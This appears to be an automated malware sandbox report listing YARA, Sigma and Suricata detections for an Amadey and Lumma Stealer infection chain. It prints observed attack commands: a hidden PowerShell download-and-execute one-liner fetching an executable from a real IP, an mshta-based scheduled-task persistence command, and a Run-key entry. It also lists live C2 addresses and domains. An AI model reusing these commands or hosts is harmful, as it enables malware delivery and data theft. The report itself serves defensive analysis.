00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000003E.00000002.2603863447.0000000000081000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000005E.00000002.2799418989.0000000000081000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000005D.00000002.2891041549.0000000000081000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000004C.00000002.2707806228.0000000000081000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: mshta.exe PID: 3156	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 2412	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7484	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7432	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 3964	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1516	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 7408	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6964	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 4108	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5316	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 2504	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6156	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 7268	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7284	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
49.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
77.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
77.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
12.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
42.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
82.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
7.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
42.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
12.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
82.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
7.2.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
49.0.1759c0aff4.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
94.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.7f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
62.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
93.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.f60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
56.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
76.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.7f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 15 entries

Other

Source	Rule	Description	Author
amsi64_7484.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7432.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_1516.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6964.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_5316.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6156.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_7284.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8104, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, ProcessId: 3716, ProcessName: schtasks.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1759c0aff4.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7484, ProcessName: powershell.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\mshta.exe, SourceProcessId: 2504, StartAddress: 209DAFB0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 2504

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8104, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f, ProcessId: 3716, ProcessName: schtasks.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7484, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1759c0aff4.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7484, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7484, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 8160, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 8160, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6416, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7484, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:07:10.626302+0100	2028371	3	Unknown Traffic	192.168.2.4	50075	172.67.132.7	443	TCP
2025-01-07T10:09:17.595497+0100	2028371	3	Unknown Traffic	192.168.2.4	50021	104.102.49.254	443	TCP
2025-01-07T10:09:18.847423+0100	2028371	3	Unknown Traffic	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:19.749392+0100	2028371	3	Unknown Traffic	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:20.864053+0100	2028371	3	Unknown Traffic	192.168.2.4	50028	104.21.96.1	443	TCP
2025-01-07T10:09:22.069532+0100	2028371	3	Unknown Traffic	192.168.2.4	50032	104.21.96.1	443	TCP
2025-01-07T10:09:23.091590+0100	2028371	3	Unknown Traffic	192.168.2.4	50033	104.21.96.1	443	TCP
2025-01-07T10:09:23.774590+0100	2028371	3	Unknown Traffic	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:24.279055+0100	2028371	3	Unknown Traffic	192.168.2.4	50035	104.21.96.1	443	TCP
2025-01-07T10:09:24.711810+0100	2028371	3	Unknown Traffic	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:25.586074+0100	2028371	3	Unknown Traffic	192.168.2.4	50038	104.21.96.1	443	TCP
2025-01-07T10:09:25.877426+0100	2028371	3	Unknown Traffic	192.168.2.4	50039	188.114.97.3	443	TCP
2025-01-07T10:09:27.334404+0100	2028371	3	Unknown Traffic	192.168.2.4	50041	188.114.97.3	443	TCP
2025-01-07T10:09:27.562331+0100	2028371	3	Unknown Traffic	192.168.2.4	50043	104.21.96.1	443	TCP
2025-01-07T10:09:28.451460+0100	2028371	3	Unknown Traffic	192.168.2.4	50044	188.114.97.3	443	TCP
2025-01-07T10:09:29.721761+0100	2028371	3	Unknown Traffic	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:32.863770+0100	2028371	3	Unknown Traffic	192.168.2.4	50051	188.114.97.3	443	TCP
2025-01-07T10:09:36.163692+0100	2028371	3	Unknown Traffic	192.168.2.4	50058	188.114.97.3	443	TCP
2025-01-07T10:09:42.596916+0100	2028371	3	Unknown Traffic	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:43.682989+0100	2028371	3	Unknown Traffic	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:44.818054+0100	2028371	3	Unknown Traffic	192.168.2.4	50066	172.67.132.7	443	TCP
2025-01-07T10:09:45.965848+0100	2028371	3	Unknown Traffic	192.168.2.4	50068	172.67.132.7	443	TCP
2025-01-07T10:09:47.090111+0100	2028371	3	Unknown Traffic	192.168.2.4	50069	172.67.132.7	443	TCP
2025-01-07T10:09:48.544522+0100	2028371	3	Unknown Traffic	192.168.2.4	50070	172.67.132.7	443	TCP
2025-01-07T10:09:49.789331+0100	2028371	3	Unknown Traffic	192.168.2.4	50073	172.67.132.7	443	TCP

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:39.696019+0100	2035595	1	Domain Observed Used for C2 Detected	191.101.130.246	56001	192.168.2.4	50060	TCP

ET MALWARE LUMAR Stealer Exfiltration M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:35.296948+0100	2048736	1	A Network Trojan was detected	192.168.2.4	50057	185.244.212.106	2227	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:19.287789+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:20.229732+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:24.234498+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:25.205900+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:28.037910+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50043	104.21.96.1	443	TCP
2025-01-07T10:09:36.632315+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50058	188.114.97.3	443	TCP
2025-01-07T10:09:43.049396+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:44.198850+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:52.685640+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50075	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:19.287789+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:24.234498+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:43.049396+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50062	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:20.229732+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:25.205900+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:44.198850+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50063	172.67.132.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:07:10.626302+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50075	172.67.132.7	443	TCP
2025-01-07T10:09:42.596916+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:43.682989+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:44.818054+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50066	172.67.132.7	443	TCP
2025-01-07T10:09:45.965848+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50068	172.67.132.7	443	TCP
2025-01-07T10:09:47.090111+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50069	172.67.132.7	443	TCP
2025-01-07T10:09:48.544522+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50070	172.67.132.7	443	TCP
2025-01-07T10:09:49.789331+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	50073	172.67.132.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:23.774590+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:24.711810+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:25.877426+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50039	188.114.97.3	443	TCP
2025-01-07T10:09:27.334404+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50041	188.114.97.3	443	TCP
2025-01-07T10:09:28.451460+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50044	188.114.97.3	443	TCP
2025-01-07T10:09:29.721761+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:32.863770+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50051	188.114.97.3	443	TCP
2025-01-07T10:09:36.163692+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	50058	188.114.97.3	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:11.929661+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49840	185.215.113.43	80	TCP
2025-01-07T10:08:15.512088+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49860	185.215.113.43	80	TCP
2025-01-07T10:08:58.874726+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50016	185.215.113.43	80	TCP
2025-01-07T10:09:12.187331+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50018	185.215.113.43	80	TCP
2025-01-07T10:09:17.078573+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50020	185.215.113.43	80	TCP
2025-01-07T10:09:21.303355+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50029	185.215.113.43	80	TCP
2025-01-07T10:09:25.695358+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50037	185.215.113.43	80	TCP
2025-01-07T10:09:30.843047+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50048	185.215.113.43	80	TCP
2025-01-07T10:09:35.075422+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50055	185.215.113.43	80	TCP
